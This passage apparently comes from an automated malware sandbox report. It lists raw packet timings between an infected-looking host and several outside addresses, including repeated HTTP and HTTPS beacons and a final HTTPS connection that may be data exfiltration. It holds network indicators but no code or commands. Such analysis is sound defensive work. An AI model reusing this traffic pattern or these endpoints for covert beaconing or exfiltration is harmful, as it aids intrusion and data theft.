                                                            Sep 25, 2024 16:01:27.398922920 CEST4971080192.168.2.8185.29.11.53
                                                            Sep 25, 2024 16:01:27.398926973 CEST8049710185.29.11.53192.168.2.8
                                                            Sep 25, 2024 16:01:27.398937941 CEST8049710185.29.11.53192.168.2.8
                                                            Sep 25, 2024 16:01:27.398951054 CEST8049710185.29.11.53192.168.2.8
                                                            Sep 25, 2024 16:01:27.398952007 CEST4971080192.168.2.8185.29.11.53
                                                            Sep 25, 2024 16:01:27.399024963 CEST4971080192.168.2.8185.29.11.53
                                                            Sep 25, 2024 16:01:27.404110909 CEST8049710185.29.11.53192.168.2.8
                                                            Sep 25, 2024 16:01:27.404138088 CEST8049710185.29.11.53192.168.2.8
                                                            Sep 25, 2024 16:01:27.404150963 CEST8049710185.29.11.53192.168.2.8
                                                            Sep 25, 2024 16:01:27.404172897 CEST4971080192.168.2.8185.29.11.53
                                                            Sep 25, 2024 16:01:27.404197931 CEST4971080192.168.2.8185.29.11.53
                                                            Sep 25, 2024 16:01:27.404198885 CEST8049710185.29.11.53192.168.2.8
                                                            Sep 25, 2024 16:01:27.404210091 CEST8049710185.29.11.53192.168.2.8
                                                            Sep 25, 2024 16:01:27.404223919 CEST8049710185.29.11.53192.168.2.8
                                                            Sep 25, 2024 16:01:27.404236078 CEST8049710185.29.11.53192.168.2.8
                                                            Sep 25, 2024 16:01:27.404247046 CEST4971080192.168.2.8185.29.11.53
                                                            Sep 25, 2024 16:01:27.404278040 CEST4971080192.168.2.8185.29.11.53
                                                            Sep 25, 2024 16:01:27.404284000 CEST8049710185.29.11.53192.168.2.8
                                                            Sep 25, 2024 16:01:27.404295921 CEST8049710185.29.11.53192.168.2.8
                                                            Sep 25, 2024 16:01:27.404308081 CEST8049710185.29.11.53192.168.2.8
                                                            Sep 25, 2024 16:01:27.404320002 CEST8049710185.29.11.53192.168.2.8
                                                            Sep 25, 2024 16:01:27.404321909 CEST4971080192.168.2.8185.29.11.53
                                                            Sep 25, 2024 16:01:27.404331923 CEST8049710185.29.11.53192.168.2.8
                                                            Sep 25, 2024 16:01:27.404341936 CEST8049710185.29.11.53192.168.2.8
                                                            Sep 25, 2024 16:01:27.404349089 CEST4971080192.168.2.8185.29.11.53
                                                            Sep 25, 2024 16:01:27.404378891 CEST4971080192.168.2.8185.29.11.53
                                                            Sep 25, 2024 16:01:27.404432058 CEST8049710185.29.11.53192.168.2.8
                                                            Sep 25, 2024 16:01:27.404445887 CEST8049710185.29.11.53192.168.2.8
                                                            Sep 25, 2024 16:01:27.404452085 CEST8049710185.29.11.53192.168.2.8
                                                            Sep 25, 2024 16:01:27.404457092 CEST8049710185.29.11.53192.168.2.8
                                                            Sep 25, 2024 16:01:27.404463053 CEST8049710185.29.11.53192.168.2.8
                                                            Sep 25, 2024 16:01:27.404468060 CEST8049710185.29.11.53192.168.2.8
                                                            Sep 25, 2024 16:01:27.404474974 CEST8049710185.29.11.53192.168.2.8
                                                            Sep 25, 2024 16:01:27.404479980 CEST8049710185.29.11.53192.168.2.8
                                                            Sep 25, 2024 16:01:27.404485941 CEST8049710185.29.11.53192.168.2.8
                                                            Sep 25, 2024 16:01:27.404489994 CEST8049710185.29.11.53192.168.2.8
                                                            Sep 25, 2024 16:01:27.404500961 CEST8049710185.29.11.53192.168.2.8
                                                            Sep 25, 2024 16:01:27.404509068 CEST8049710185.29.11.53192.168.2.8
                                                            Sep 25, 2024 16:01:27.404556036 CEST4971080192.168.2.8185.29.11.53
                                                            Sep 25, 2024 16:01:27.404584885 CEST8049710185.29.11.53192.168.2.8
                                                            Sep 25, 2024 16:01:27.404593945 CEST4971080192.168.2.8185.29.11.53
                                                            Sep 25, 2024 16:01:27.404620886 CEST4971080192.168.2.8185.29.11.53
                                                            Sep 25, 2024 16:01:27.415457010 CEST8049710185.29.11.53192.168.2.8
                                                            Sep 25, 2024 16:01:27.415473938 CEST8049710185.29.11.53192.168.2.8
                                                            Sep 25, 2024 16:01:27.415487051 CEST8049710185.29.11.53192.168.2.8
                                                            Sep 25, 2024 16:01:27.415498018 CEST8049710185.29.11.53192.168.2.8
                                                            Sep 25, 2024 16:01:27.415510893 CEST8049710185.29.11.53192.168.2.8
                                                            Sep 25, 2024 16:01:27.415523052 CEST8049710185.29.11.53192.168.2.8
                                                            Sep 25, 2024 16:01:27.415530920 CEST4971080192.168.2.8185.29.11.53
                                                            Sep 25, 2024 16:01:27.415534973 CEST8049710185.29.11.53192.168.2.8
                                                            Sep 25, 2024 16:01:27.415546894 CEST8049710185.29.11.53192.168.2.8
                                                            Sep 25, 2024 16:01:27.415551901 CEST4971080192.168.2.8185.29.11.53
                                                            Sep 25, 2024 16:01:27.415559053 CEST8049710185.29.11.53192.168.2.8
                                                            Sep 25, 2024 16:01:27.415571928 CEST8049710185.29.11.53192.168.2.8
                                                            Sep 25, 2024 16:01:27.415585041 CEST8049710185.29.11.53192.168.2.8
                                                            Sep 25, 2024 16:01:27.415585041 CEST4971080192.168.2.8185.29.11.53
                                                            Sep 25, 2024 16:01:27.415596962 CEST8049710185.29.11.53192.168.2.8
                                                            Sep 25, 2024 16:01:27.415604115 CEST4971080192.168.2.8185.29.11.53
                                                            Sep 25, 2024 16:01:27.415610075 CEST8049710185.29.11.53192.168.2.8
                                                            Sep 25, 2024 16:01:27.415621042 CEST8049710185.29.11.53192.168.2.8
                                                            Sep 25, 2024 16:01:27.415631056 CEST4971080192.168.2.8185.29.11.53
                                                            Sep 25, 2024 16:01:27.415633917 CEST8049710185.29.11.53192.168.2.8
                                                            Sep 25, 2024 16:01:27.415644884 CEST8049710185.29.11.53192.168.2.8
                                                            Sep 25, 2024 16:01:27.415657997 CEST8049710185.29.11.53192.168.2.8
                                                            Sep 25, 2024 16:01:27.415667057 CEST4971080192.168.2.8185.29.11.53
                                                            Sep 25, 2024 16:01:27.415671110 CEST8049710185.29.11.53192.168.2.8
                                                            Sep 25, 2024 16:01:27.415683985 CEST8049710185.29.11.53192.168.2.8
                                                            Sep 25, 2024 16:01:27.415687084 CEST4971080192.168.2.8185.29.11.53
                                                            Sep 25, 2024 16:01:27.415694952 CEST8049710185.29.11.53192.168.2.8
                                                            Sep 25, 2024 16:01:27.415702105 CEST4971080192.168.2.8185.29.11.53
                                                            Sep 25, 2024 16:01:27.415709972 CEST8049710185.29.11.53192.168.2.8
                                                            Sep 25, 2024 16:01:27.415720940 CEST8049710185.29.11.53192.168.2.8
                                                            Sep 25, 2024 16:01:27.415723085 CEST4971080192.168.2.8185.29.11.53
                                                            Sep 25, 2024 16:01:27.415733099 CEST8049710185.29.11.53192.168.2.8
                                                            Sep 25, 2024 16:01:27.415745020 CEST8049710185.29.11.53192.168.2.8
                                                            Sep 25, 2024 16:01:27.415756941 CEST8049710185.29.11.53192.168.2.8
                                                            Sep 25, 2024 16:01:27.415760040 CEST4971080192.168.2.8185.29.11.53
                                                            Sep 25, 2024 16:01:27.415767908 CEST8049710185.29.11.53192.168.2.8
                                                            Sep 25, 2024 16:01:27.415780067 CEST8049710185.29.11.53192.168.2.8
                                                            Sep 25, 2024 16:01:27.415791988 CEST8049710185.29.11.53192.168.2.8
                                                            Sep 25, 2024 16:01:27.415801048 CEST4971080192.168.2.8185.29.11.53
                                                            Sep 25, 2024 16:01:27.415803909 CEST8049710185.29.11.53192.168.2.8
                                                            Sep 25, 2024 16:01:27.415816069 CEST8049710185.29.11.53192.168.2.8
                                                            Sep 25, 2024 16:01:27.415822029 CEST4971080192.168.2.8185.29.11.53
                                                            Sep 25, 2024 16:01:27.415827990 CEST8049710185.29.11.53192.168.2.8
                                                            Sep 25, 2024 16:01:27.415836096 CEST4971080192.168.2.8185.29.11.53
                                                            Sep 25, 2024 16:01:27.415839911 CEST8049710185.29.11.53192.168.2.8
                                                            Sep 25, 2024 16:01:27.415852070 CEST8049710185.29.11.53192.168.2.8
                                                            Sep 25, 2024 16:01:27.415858030 CEST4971080192.168.2.8185.29.11.53
                                                            Sep 25, 2024 16:01:27.415864944 CEST8049710185.29.11.53192.168.2.8
                                                            Sep 25, 2024 16:01:27.415878057 CEST8049710185.29.11.53192.168.2.8
                                                            Sep 25, 2024 16:01:27.415889978 CEST4971080192.168.2.8185.29.11.53
                                                            Sep 25, 2024 16:01:27.415889978 CEST8049710185.29.11.53192.168.2.8
                                                            Sep 25, 2024 16:01:27.415901899 CEST8049710185.29.11.53192.168.2.8
                                                            Sep 25, 2024 16:01:27.415915012 CEST8049710185.29.11.53192.168.2.8
                                                            Sep 25, 2024 16:01:27.415931940 CEST4971080192.168.2.8185.29.11.53
                                                            Sep 25, 2024 16:01:27.415951967 CEST4971080192.168.2.8185.29.11.53
                                                            Sep 25, 2024 16:01:27.415977001 CEST4971080192.168.2.8185.29.11.53
                                                            Sep 25, 2024 16:01:27.416712999 CEST8049710185.29.11.53192.168.2.8
                                                            Sep 25, 2024 16:01:27.416738033 CEST8049710185.29.11.53192.168.2.8
                                                            Sep 25, 2024 16:01:27.416750908 CEST8049710185.29.11.53192.168.2.8
                                                            Sep 25, 2024 16:01:27.416760921 CEST4971080192.168.2.8185.29.11.53
                                                            Sep 25, 2024 16:01:27.416775942 CEST4971080192.168.2.8185.29.11.53
                                                            Sep 25, 2024 16:01:27.416780949 CEST8049710185.29.11.53192.168.2.8
                                                            Sep 25, 2024 16:01:27.416793108 CEST8049710185.29.11.53192.168.2.8
                                                            Sep 25, 2024 16:01:27.416795015 CEST4971080192.168.2.8185.29.11.53
                                                            Sep 25, 2024 16:01:27.416825056 CEST4971080192.168.2.8185.29.11.53
                                                            Sep 25, 2024 16:01:27.416831970 CEST4971080192.168.2.8185.29.11.53
                                                            Sep 25, 2024 16:01:27.416831970 CEST8049710185.29.11.53192.168.2.8
                                                            Sep 25, 2024 16:01:27.416898966 CEST4971080192.168.2.8185.29.11.53
                                                            Sep 25, 2024 16:01:27.726623058 CEST4971180192.168.2.8132.226.247.73
                                                            Sep 25, 2024 16:01:27.731508017 CEST8049711132.226.247.73192.168.2.8
                                                            Sep 25, 2024 16:01:27.731575966 CEST4971180192.168.2.8132.226.247.73
                                                            Sep 25, 2024 16:01:27.731781960 CEST4971180192.168.2.8132.226.247.73
                                                            Sep 25, 2024 16:01:27.736515045 CEST8049711132.226.247.73192.168.2.8
                                                            Sep 25, 2024 16:01:28.417197943 CEST8049711132.226.247.73192.168.2.8
                                                            Sep 25, 2024 16:01:28.421348095 CEST4971180192.168.2.8132.226.247.73
                                                            Sep 25, 2024 16:01:28.426203966 CEST8049711132.226.247.73192.168.2.8
                                                            Sep 25, 2024 16:01:28.630296946 CEST8049711132.226.247.73192.168.2.8
                                                            Sep 25, 2024 16:01:28.683635950 CEST4971180192.168.2.8132.226.247.73
                                                            Sep 25, 2024 16:01:29.279510021 CEST49713443192.168.2.8188.114.97.3
                                                            Sep 25, 2024 16:01:29.279556036 CEST44349713188.114.97.3192.168.2.8
                                                            Sep 25, 2024 16:01:29.279748917 CEST49713443192.168.2.8188.114.97.3
                                                            Sep 25, 2024 16:01:29.293921947 CEST49713443192.168.2.8188.114.97.3
                                                            Sep 25, 2024 16:01:29.293941975 CEST44349713188.114.97.3192.168.2.8
                                                            Sep 25, 2024 16:01:29.782042980 CEST44349713188.114.97.3192.168.2.8
                                                            Sep 25, 2024 16:01:29.782131910 CEST49713443192.168.2.8188.114.97.3
                                                            Sep 25, 2024 16:01:29.788362980 CEST49713443192.168.2.8188.114.97.3
                                                            Sep 25, 2024 16:01:29.788393021 CEST44349713188.114.97.3192.168.2.8
                                                            Sep 25, 2024 16:01:29.788840055 CEST44349713188.114.97.3192.168.2.8
                                                            Sep 25, 2024 16:01:29.839890003 CEST49713443192.168.2.8188.114.97.3
                                                            Sep 25, 2024 16:01:29.843058109 CEST49713443192.168.2.8188.114.97.3
                                                            Sep 25, 2024 16:01:29.887413979 CEST44349713188.114.97.3192.168.2.8
                                                            Sep 25, 2024 16:01:30.109656096 CEST44349713188.114.97.3192.168.2.8
                                                            Sep 25, 2024 16:01:30.109759092 CEST44349713188.114.97.3192.168.2.8
                                                            Sep 25, 2024 16:01:30.109807014 CEST49713443192.168.2.8188.114.97.3
                                                            Sep 25, 2024 16:01:30.114414930 CEST49713443192.168.2.8188.114.97.3
                                                            Sep 25, 2024 16:01:30.134605885 CEST4971180192.168.2.8132.226.247.73
                                                            Sep 25, 2024 16:01:30.139451981 CEST8049711132.226.247.73192.168.2.8
                                                            Sep 25, 2024 16:01:30.343353987 CEST8049711132.226.247.73192.168.2.8
                                                            Sep 25, 2024 16:01:30.346256018 CEST49715443192.168.2.8188.114.97.3
                                                            Sep 25, 2024 16:01:30.346323013 CEST44349715188.114.97.3192.168.2.8
                                                            Sep 25, 2024 16:01:30.346398115 CEST49715443192.168.2.8188.114.97.3
                                                            Sep 25, 2024 16:01:30.346716881 CEST49715443192.168.2.8188.114.97.3
                                                            Sep 25, 2024 16:01:30.346739054 CEST44349715188.114.97.3192.168.2.8
                                                            Sep 25, 2024 16:01:30.386761904 CEST4971180192.168.2.8132.226.247.73
                                                            Sep 25, 2024 16:01:30.823992968 CEST44349715188.114.97.3192.168.2.8
                                                            Sep 25, 2024 16:01:30.833246946 CEST49715443192.168.2.8188.114.97.3
                                                            Sep 25, 2024 16:01:30.833276987 CEST44349715188.114.97.3192.168.2.8
                                                            Sep 25, 2024 16:01:30.954104900 CEST44349715188.114.97.3192.168.2.8
                                                            Sep 25, 2024 16:01:30.954199076 CEST44349715188.114.97.3192.168.2.8
                                                            Sep 25, 2024 16:01:30.954253912 CEST49715443192.168.2.8188.114.97.3
                                                            Sep 25, 2024 16:01:30.954719067 CEST49715443192.168.2.8188.114.97.3
                                                            Sep 25, 2024 16:01:30.957942963 CEST4971180192.168.2.8132.226.247.73
                                                            Sep 25, 2024 16:01:30.959353924 CEST4971680192.168.2.8132.226.247.73
                                                            Sep 25, 2024 16:01:30.963031054 CEST8049711132.226.247.73192.168.2.8
                                                            Sep 25, 2024 16:01:30.963124037 CEST4971180192.168.2.8132.226.247.73
                                                            Sep 25, 2024 16:01:30.964257002 CEST8049716132.226.247.73192.168.2.8
                                                            Sep 25, 2024 16:01:30.964327097 CEST4971680192.168.2.8132.226.247.73
                                                            Sep 25, 2024 16:01:30.964415073 CEST4971680192.168.2.8132.226.247.73
                                                            Sep 25, 2024 16:01:30.969189882 CEST8049716132.226.247.73192.168.2.8
                                                            Sep 25, 2024 16:01:31.637789011 CEST8049716132.226.247.73192.168.2.8
                                                            Sep 25, 2024 16:01:31.639033079 CEST49717443192.168.2.8188.114.97.3
                                                            Sep 25, 2024 16:01:31.639162064 CEST44349717188.114.97.3192.168.2.8
                                                            Sep 25, 2024 16:01:31.639300108 CEST49717443192.168.2.8188.114.97.3
                                                            Sep 25, 2024 16:01:31.639549017 CEST49717443192.168.2.8188.114.97.3
                                                            Sep 25, 2024 16:01:31.639588118 CEST44349717188.114.97.3192.168.2.8
                                                            Sep 25, 2024 16:01:31.683648109 CEST4971680192.168.2.8132.226.247.73
                                                            Sep 25, 2024 16:01:32.099658012 CEST44349717188.114.97.3192.168.2.8
                                                            Sep 25, 2024 16:01:32.107424021 CEST49717443192.168.2.8188.114.97.3
                                                            Sep 25, 2024 16:01:32.107462883 CEST44349717188.114.97.3192.168.2.8
                                                            Sep 25, 2024 16:01:32.251331091 CEST44349717188.114.97.3192.168.2.8
                                                            Sep 25, 2024 16:01:32.251466990 CEST44349717188.114.97.3192.168.2.8
                                                            Sep 25, 2024 16:01:32.251550913 CEST49717443192.168.2.8188.114.97.3
                                                            Sep 25, 2024 16:01:32.252095938 CEST49717443192.168.2.8188.114.97.3
                                                            Sep 25, 2024 16:01:32.256432056 CEST4971880192.168.2.8132.226.247.73
                                                            Sep 25, 2024 16:01:32.261246920 CEST8049718132.226.247.73192.168.2.8
                                                            Sep 25, 2024 16:01:32.264889956 CEST4971880192.168.2.8132.226.247.73
                                                            Sep 25, 2024 16:01:32.265062094 CEST4971880192.168.2.8132.226.247.73
                                                            Sep 25, 2024 16:01:32.269942999 CEST8049718132.226.247.73192.168.2.8
                                                            Sep 25, 2024 16:01:32.957473040 CEST8049718132.226.247.73192.168.2.8
                                                            Sep 25, 2024 16:01:32.958802938 CEST49719443192.168.2.8188.114.97.3
                                                            Sep 25, 2024 16:01:32.958851099 CEST44349719188.114.97.3192.168.2.8
                                                            Sep 25, 2024 16:01:32.958930016 CEST49719443192.168.2.8188.114.97.3
                                                            Sep 25, 2024 16:01:32.959178925 CEST49719443192.168.2.8188.114.97.3
                                                            Sep 25, 2024 16:01:32.959194899 CEST44349719188.114.97.3192.168.2.8
                                                            Sep 25, 2024 16:01:33.011774063 CEST4971880192.168.2.8132.226.247.73
                                                            Sep 25, 2024 16:01:33.416737080 CEST44349719188.114.97.3192.168.2.8
                                                            Sep 25, 2024 16:01:33.418996096 CEST49719443192.168.2.8188.114.97.3
                                                            Sep 25, 2024 16:01:33.419008970 CEST44349719188.114.97.3192.168.2.8
                                                            Sep 25, 2024 16:01:33.557709932 CEST44349719188.114.97.3192.168.2.8
                                                            Sep 25, 2024 16:01:33.557837009 CEST44349719188.114.97.3192.168.2.8
                                                            Sep 25, 2024 16:01:33.557892084 CEST49719443192.168.2.8188.114.97.3
                                                            Sep 25, 2024 16:01:33.558301926 CEST49719443192.168.2.8188.114.97.3
                                                            Sep 25, 2024 16:01:33.564223051 CEST4971880192.168.2.8132.226.247.73
                                                            Sep 25, 2024 16:01:33.565290928 CEST4972080192.168.2.8132.226.247.73
                                                            Sep 25, 2024 16:01:33.570285082 CEST8049720132.226.247.73192.168.2.8
                                                            Sep 25, 2024 16:01:33.570297956 CEST8049718132.226.247.73192.168.2.8
                                                            Sep 25, 2024 16:01:33.570342064 CEST4972080192.168.2.8132.226.247.73
                                                            Sep 25, 2024 16:01:33.570394993 CEST4971880192.168.2.8132.226.247.73
                                                            Sep 25, 2024 16:01:33.570441961 CEST4972080192.168.2.8132.226.247.73
                                                            Sep 25, 2024 16:01:33.575957060 CEST8049720132.226.247.73192.168.2.8
                                                            Sep 25, 2024 16:01:34.244263887 CEST8049720132.226.247.73192.168.2.8
                                                            Sep 25, 2024 16:01:34.245503902 CEST49721443192.168.2.8188.114.97.3
                                                            Sep 25, 2024 16:01:34.245537996 CEST44349721188.114.97.3192.168.2.8
                                                            Sep 25, 2024 16:01:34.245600939 CEST49721443192.168.2.8188.114.97.3
                                                            Sep 25, 2024 16:01:34.245846033 CEST49721443192.168.2.8188.114.97.3
                                                            Sep 25, 2024 16:01:34.245861053 CEST44349721188.114.97.3192.168.2.8
                                                            Sep 25, 2024 16:01:34.402401924 CEST4972080192.168.2.8132.226.247.73
                                                            Sep 25, 2024 16:01:34.706890106 CEST44349721188.114.97.3192.168.2.8
                                                            Sep 25, 2024 16:01:34.708379030 CEST49721443192.168.2.8188.114.97.3
                                                            Sep 25, 2024 16:01:34.708401918 CEST44349721188.114.97.3192.168.2.8
                                                            Sep 25, 2024 16:01:34.877008915 CEST44349721188.114.97.3192.168.2.8
                                                            Sep 25, 2024 16:01:34.877099991 CEST44349721188.114.97.3192.168.2.8
                                                            Sep 25, 2024 16:01:34.877187014 CEST49721443192.168.2.8188.114.97.3
                                                            Sep 25, 2024 16:01:34.877861023 CEST49721443192.168.2.8188.114.97.3
                                                            Sep 25, 2024 16:01:34.880836010 CEST4972080192.168.2.8132.226.247.73
                                                            Sep 25, 2024 16:01:34.881962061 CEST4972280192.168.2.8132.226.247.73
                                                            Sep 25, 2024 16:01:34.887064934 CEST8049720132.226.247.73192.168.2.8
                                                            Sep 25, 2024 16:01:34.887145042 CEST4972080192.168.2.8132.226.247.73
                                                            Sep 25, 2024 16:01:34.887525082 CEST8049722132.226.247.73192.168.2.8
                                                            Sep 25, 2024 16:01:34.887593985 CEST4972280192.168.2.8132.226.247.73
                                                            Sep 25, 2024 16:01:34.887885094 CEST4972280192.168.2.8132.226.247.73
                                                            Sep 25, 2024 16:01:34.894929886 CEST8049722132.226.247.73192.168.2.8
                                                            Sep 25, 2024 16:01:35.553495884 CEST8049722132.226.247.73192.168.2.8
                                                            Sep 25, 2024 16:01:35.554966927 CEST49723443192.168.2.8188.114.97.3
                                                            Sep 25, 2024 16:01:35.555003881 CEST44349723188.114.97.3192.168.2.8
                                                            Sep 25, 2024 16:01:35.555075884 CEST49723443192.168.2.8188.114.97.3
                                                            Sep 25, 2024 16:01:35.555381060 CEST49723443192.168.2.8188.114.97.3
                                                            Sep 25, 2024 16:01:35.555402994 CEST44349723188.114.97.3192.168.2.8
                                                            Sep 25, 2024 16:01:35.605612993 CEST4972280192.168.2.8132.226.247.73
                                                            Sep 25, 2024 16:01:36.035864115 CEST44349723188.114.97.3192.168.2.8
                                                            Sep 25, 2024 16:01:36.037668943 CEST49723443192.168.2.8188.114.97.3
                                                            Sep 25, 2024 16:01:36.037693977 CEST44349723188.114.97.3192.168.2.8
                                                            Sep 25, 2024 16:01:36.173316002 CEST44349723188.114.97.3192.168.2.8
                                                            Sep 25, 2024 16:01:36.173424006 CEST44349723188.114.97.3192.168.2.8
                                                            Sep 25, 2024 16:01:36.173505068 CEST49723443192.168.2.8188.114.97.3
                                                            Sep 25, 2024 16:01:36.177107096 CEST49723443192.168.2.8188.114.97.3
                                                            Sep 25, 2024 16:01:36.180850983 CEST4972280192.168.2.8132.226.247.73
                                                            Sep 25, 2024 16:01:36.181535006 CEST4972480192.168.2.8132.226.247.73
                                                            Sep 25, 2024 16:01:36.185939074 CEST8049722132.226.247.73192.168.2.8
                                                            Sep 25, 2024 16:01:36.186176062 CEST4972280192.168.2.8132.226.247.73
                                                            Sep 25, 2024 16:01:36.186693907 CEST8049724132.226.247.73192.168.2.8
                                                            Sep 25, 2024 16:01:36.186767101 CEST4972480192.168.2.8132.226.247.73
                                                            Sep 25, 2024 16:01:36.186857939 CEST4972480192.168.2.8132.226.247.73
                                                            Sep 25, 2024 16:01:36.191709995 CEST8049724132.226.247.73192.168.2.8
                                                            Sep 25, 2024 16:01:37.094461918 CEST8049724132.226.247.73192.168.2.8
                                                            Sep 25, 2024 16:01:37.095856905 CEST8049724132.226.247.73192.168.2.8
                                                            Sep 25, 2024 16:01:37.095912933 CEST4972480192.168.2.8132.226.247.73
                                                            Sep 25, 2024 16:01:37.096118927 CEST49725443192.168.2.8188.114.97.3
                                                            Sep 25, 2024 16:01:37.096163034 CEST44349725188.114.97.3192.168.2.8
                                                            Sep 25, 2024 16:01:37.096229076 CEST49725443192.168.2.8188.114.97.3
                                                            Sep 25, 2024 16:01:37.096482038 CEST49725443192.168.2.8188.114.97.3
                                                            Sep 25, 2024 16:01:37.096496105 CEST44349725188.114.97.3192.168.2.8
                                                            Sep 25, 2024 16:01:37.554128885 CEST44349725188.114.97.3192.168.2.8
                                                            Sep 25, 2024 16:01:37.555718899 CEST49725443192.168.2.8188.114.97.3
                                                            Sep 25, 2024 16:01:37.555763006 CEST44349725188.114.97.3192.168.2.8
                                                            Sep 25, 2024 16:01:37.705404997 CEST44349725188.114.97.3192.168.2.8
                                                            Sep 25, 2024 16:01:37.705523968 CEST44349725188.114.97.3192.168.2.8
                                                            Sep 25, 2024 16:01:37.705578089 CEST49725443192.168.2.8188.114.97.3
                                                            Sep 25, 2024 16:01:37.706034899 CEST49725443192.168.2.8188.114.97.3
                                                            Sep 25, 2024 16:01:37.709260941 CEST4972480192.168.2.8132.226.247.73
                                                            Sep 25, 2024 16:01:37.710505962 CEST4972680192.168.2.8132.226.247.73
                                                            Sep 25, 2024 16:01:37.714448929 CEST8049724132.226.247.73192.168.2.8
                                                            Sep 25, 2024 16:01:37.714524031 CEST4972480192.168.2.8132.226.247.73
                                                            Sep 25, 2024 16:01:37.716427088 CEST8049726132.226.247.73192.168.2.8
                                                            Sep 25, 2024 16:01:37.716640949 CEST4972680192.168.2.8132.226.247.73
                                                            Sep 25, 2024 16:01:37.716640949 CEST4972680192.168.2.8132.226.247.73
                                                            Sep 25, 2024 16:01:37.721504927 CEST8049726132.226.247.73192.168.2.8
                                                            Sep 25, 2024 16:01:38.425971031 CEST8049726132.226.247.73192.168.2.8
                                                            Sep 25, 2024 16:01:38.427208900 CEST49727443192.168.2.8188.114.97.3
                                                            Sep 25, 2024 16:01:38.427257061 CEST44349727188.114.97.3192.168.2.8
                                                            Sep 25, 2024 16:01:38.427508116 CEST49727443192.168.2.8188.114.97.3
                                                            Sep 25, 2024 16:01:38.427804947 CEST49727443192.168.2.8188.114.97.3
                                                            Sep 25, 2024 16:01:38.427819014 CEST44349727188.114.97.3192.168.2.8
                                                            Sep 25, 2024 16:01:38.480587959 CEST4972680192.168.2.8132.226.247.73
                                                            Sep 25, 2024 16:01:38.886761904 CEST44349727188.114.97.3192.168.2.8
                                                            Sep 25, 2024 16:01:38.892153978 CEST49727443192.168.2.8188.114.97.3
                                                            Sep 25, 2024 16:01:38.892169952 CEST44349727188.114.97.3192.168.2.8
                                                            Sep 25, 2024 16:01:39.227324009 CEST44349727188.114.97.3192.168.2.8
                                                            Sep 25, 2024 16:01:39.227447033 CEST44349727188.114.97.3192.168.2.8
                                                            Sep 25, 2024 16:01:39.227511883 CEST49727443192.168.2.8188.114.97.3
                                                            Sep 25, 2024 16:01:39.227922916 CEST49727443192.168.2.8188.114.97.3
                                                            Sep 25, 2024 16:01:39.231475115 CEST4972680192.168.2.8132.226.247.73
                                                            Sep 25, 2024 16:01:39.232079983 CEST4972880192.168.2.8132.226.247.73
                                                            Sep 25, 2024 16:01:39.236514091 CEST8049726132.226.247.73192.168.2.8
                                                            Sep 25, 2024 16:01:39.236625910 CEST4972680192.168.2.8132.226.247.73
                                                            Sep 25, 2024 16:01:39.236866951 CEST8049728132.226.247.73192.168.2.8
                                                            Sep 25, 2024 16:01:39.236928940 CEST4972880192.168.2.8132.226.247.73
                                                            Sep 25, 2024 16:01:39.236999989 CEST4972880192.168.2.8132.226.247.73
                                                            Sep 25, 2024 16:01:39.241713047 CEST8049728132.226.247.73192.168.2.8
                                                            Sep 25, 2024 16:01:39.903758049 CEST8049728132.226.247.73192.168.2.8
                                                            Sep 25, 2024 16:01:39.905082941 CEST49729443192.168.2.8188.114.97.3
                                                            Sep 25, 2024 16:01:39.905128002 CEST44349729188.114.97.3192.168.2.8
                                                            Sep 25, 2024 16:01:39.905217886 CEST49729443192.168.2.8188.114.97.3
                                                            Sep 25, 2024 16:01:39.905473948 CEST49729443192.168.2.8188.114.97.3
                                                            Sep 25, 2024 16:01:39.905487061 CEST44349729188.114.97.3192.168.2.8
                                                            Sep 25, 2024 16:01:39.949405909 CEST4972880192.168.2.8132.226.247.73
                                                            Sep 25, 2024 16:01:40.382255077 CEST44349729188.114.97.3192.168.2.8
                                                            Sep 25, 2024 16:01:40.383868933 CEST49729443192.168.2.8188.114.97.3
                                                            Sep 25, 2024 16:01:40.383893013 CEST44349729188.114.97.3192.168.2.8
                                                            Sep 25, 2024 16:01:40.530066967 CEST44349729188.114.97.3192.168.2.8
                                                            Sep 25, 2024 16:01:40.530164003 CEST44349729188.114.97.3192.168.2.8
                                                            Sep 25, 2024 16:01:40.530216932 CEST49729443192.168.2.8188.114.97.3
                                                            Sep 25, 2024 16:01:40.530718088 CEST49729443192.168.2.8188.114.97.3
                                                            Sep 25, 2024 16:01:40.563062906 CEST4972880192.168.2.8132.226.247.73
                                                            Sep 25, 2024 16:01:40.787496090 CEST8049728132.226.247.73192.168.2.8
                                                            Sep 25, 2024 16:01:40.787563086 CEST4972880192.168.2.8132.226.247.73
                                                            Sep 25, 2024 16:01:40.789716005 CEST49730443192.168.2.8149.154.167.220
                                                            Sep 25, 2024 16:01:40.789766073 CEST44349730149.154.167.220192.168.2.8
                                                            Sep 25, 2024 16:01:40.789828062 CEST49730443192.168.2.8149.154.167.220
                                                            Sep 25, 2024 16:01:40.790307045 CEST49730443192.168.2.8149.154.167.220
                                                            Sep 25, 2024 16:01:40.790323019 CEST44349730149.154.167.220192.168.2.8
                                                            Sep 25, 2024 16:01:41.563427925 CEST44349730149.154.167.220192.168.2.8
                                                            Sep 25, 2024 16:01:41.563509941 CEST49730443192.168.2.8149.154.167.220
                                                            Sep 25, 2024 16:01:41.567497969 CEST49730443192.168.2.8149.154.167.220
                                                            Sep 25, 2024 16:01:41.567507982 CEST44349730149.154.167.220192.168.2.8
                                                            Sep 25, 2024 16:01:41.567790985 CEST44349730149.154.167.220192.168.2.8
                                                            Sep 25, 2024 16:01:41.570779085 CEST49730443192.168.2.8149.154.167.220
                                                            Sep 25, 2024 16:01:41.615411997 CEST44349730149.154.167.220192.168.2.8
                                                            Sep 25, 2024 16:01:41.825213909 CEST44349730149.154.167.220192.168.2.8
                                                            Sep 25, 2024 16:01:41.825290918 CEST44349730149.154.167.220192.168.2.8
                                                            Sep 25, 2024 16:01:41.825366020 CEST49730443192.168.2.8149.154.167.220
                                                            Sep 25, 2024 16:01:41.873963118 CEST49730443192.168.2.8149.154.167.220
                                                            Sep 25, 2024 16:01:57.212063074 CEST4971680192.168.2.8132.226.247.73

                                                            UDP Packets

                                                            TimestampSource PortDest PortSource IPDest IP
                                                            Sep 25, 2024 16:01:27.711285114 CEST5763153192.168.2.81.1.1.1
                                                            Sep 25, 2024 16:01:27.718611002 CEST53576311.1.1.1192.168.2.8
                                                            Sep 25, 2024 16:01:29.267692089 CEST4917453192.168.2.81.1.1.1
                                                            Sep 25, 2024 16:01:29.278820992 CEST53491741.1.1.1192.168.2.8
                                                            Sep 25, 2024 16:01:40.563646078 CEST5460353192.168.2.81.1.1.1
                                                            Sep 25, 2024 16:01:40.788978100 CEST53546031.1.1.1192.168.2.8

                                                            DNS Queries

                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
